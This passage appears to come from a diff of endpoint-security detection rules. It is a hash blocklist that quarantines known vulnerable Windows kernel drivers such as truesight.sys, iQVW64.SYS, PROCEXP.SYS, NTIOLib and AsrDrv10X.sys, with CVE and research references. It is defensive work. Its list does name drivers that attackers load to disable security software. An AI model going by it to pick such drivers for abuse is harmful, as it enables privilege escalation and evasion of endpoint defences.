+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825707Z",
+ "creation_date": "2026-03-23T11:45:30.825709Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a6191d9bf3893260b98fdbb7fe591995ef808d0dfb9fdf0f8adc4c8e3807e39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cce93915-2169-5854-87c8-535c4d845953",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140436Z",
+ "creation_date": "2026-03-23T11:45:31.140439Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffbf8df7ebe5e9e986234df80d2dfe4a1c9e0c80c754ab083dca23adc479338c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cce96201-b970-5d98-a01f-b914aa626df2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485193Z",
+ "creation_date": "2026-03-23T11:45:31.485197Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485207Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f666e4c15474b933cef24d8fbec5d0548b4d8e29c8234a294f6b8d34b5a69ba0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ccebfc93-742d-552d-8679-b9f557c1a0f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157275Z",
+ "creation_date": "2026-03-23T11:45:31.157278Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157292Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11a31fe46d741ac5b1c369ba7befee1c1662c9e1ba742b59fd06fe7dc622ad3b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ccec40e6-65cb-5df2-9568-694de4162a84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153823Z",
+ "creation_date": "2026-03-23T11:45:31.153825Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153830Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "529772e2f822515b4beb7c757ba6b24f92425da9d9001e3acdeeb66acbdcb89c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ccfd2488-c74b-5836-9e9b-c56525f8b71b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143187Z",
+ "creation_date": "2026-03-23T11:45:32.143189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd070543-98d2-50b8-941a-6aef5cf04953",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824216Z",
+ "creation_date": "2026-03-23T11:45:31.824219Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fe9d82bbc96b5f06ba26cda470e65a2635a4278a756a83bc3f194f82ca876c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd0795cf-0012-5929-818e-bfa2e5b125e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825762Z",
+ "creation_date": "2026-03-23T11:45:30.825764Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825770Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc9c84e903cf4f38679ced83da831a3e0b1f52a67af63584dcd460ef37b2979f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd085da7-3b1d-51fc-ad80-6fad58dc7426",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823808Z",
+ "creation_date": "2026-03-23T11:45:30.823810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823816Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c50fd5f40905bc6a5e3dd556c2ac9076c45bf474b731cf6464e0524b7a628e1b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd0cd0ee-da64-513b-8b06-892c11af7f8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495743Z",
+ "creation_date": "2026-03-23T11:45:31.495745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495750Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1018ec7f5dd9a040766bcd50ea37af78eeb4e272fb62938c81570cc8bf579f78",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd0d686d-4b39-5c8f-bfed-f31890b68fa6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817321Z",
+ "creation_date": "2026-03-23T11:45:31.817323Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817329Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26fa810f6be2ac7eaf8abe164b866ced47bbaa09f75605482778724e1a99f0e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd238424-daa8-5ac1-a82b-630aa6f955ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825458Z",
+ "creation_date": "2026-03-23T11:45:31.825460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825466Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8dd2a8f5333e47806e0a43c260a43558fcfe636e2da3ace624265425bf9dad3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd3de490-0e58-5300-b257-e8fd7fbd2e72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605413Z",
+ "creation_date": "2026-03-23T11:45:29.605415Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74716032cc2f63c67b9df0882c6794b4bf66147d943329db5f233a04c2fd9b12",
+ "comment": "Backstab Process Explorer driver (aka PROCEXP.SYS) [https://github.com/Yaxser/Backstab/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd47f623-4458-5be1-9742-d54426297046",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487180Z",
+ "creation_date": "2026-03-23T11:45:31.487182Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487188Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f158b1653c6a42e9399b20704b5bd0e874bfff1accc74162e4b29a9eb6955218",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd497a80-a8f7-508a-a1ae-61d5c29d6d3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814210Z",
+ "creation_date": "2026-03-23T11:45:31.814213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814221Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35c4e2e810cd6526a6078d9e7fb5e084b7223da6d605830c9d11f5997791fe47",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd5f956f-4af1-5d0c-947a-c90e546aa174",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615677Z",
+ "creation_date": "2026-03-23T11:45:29.615679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c513f4d4c38a10af9f4a967bb6c7901275adf0df8046fc7e1b7e4c3e3c7c3cf",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd72cf32-8a68-540b-bd38-31618cad8fbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818820Z",
+ "creation_date": "2026-03-23T11:45:31.818823Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818831Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e259d26fedebd3a133c4455da83818ff37ec04fcaf79c1382763f5a5e0d49afc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd86920f-ca70-5587-8d37-127347bd5abc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977550Z",
+ "creation_date": "2026-03-23T11:45:29.977552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977558Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f15ae970e222ce06dbf3752b223270d0e726fb78ebec3598b4f8225b5a0880b1",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd956d48-a814-57ad-b158-a0e702310218",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482153Z",
+ "creation_date": "2026-03-23T11:45:31.482157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cb0167095ae5e3c3614b8f292e1f492a50d9ee54123bc37935ad282e5aa0bab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd95ff3c-9515-5548-b244-77db4a972e00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613277Z",
+ "creation_date": "2026-03-23T11:45:29.613279Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613285Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd97ec33-e529-5337-99b8-5e0a15c441a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836310Z",
+ "creation_date": "2026-03-23T11:45:30.836313Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ae14f1a2c380990785857b2e0581fd07208d26515a25463f39743018b756091",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd9a55b4-88d6-57ac-917b-27c91c643d80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985321Z",
+ "creation_date": "2026-03-23T11:45:29.985323Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985329Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cfa5e10dff8a99a5d544b011f676bc383991274c693e21e3af40cf6982adb8c",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cd9bcdd8-d46b-55e7-93fe-4d7892a392f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455846Z",
+ "creation_date": "2026-03-23T11:45:30.455849Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
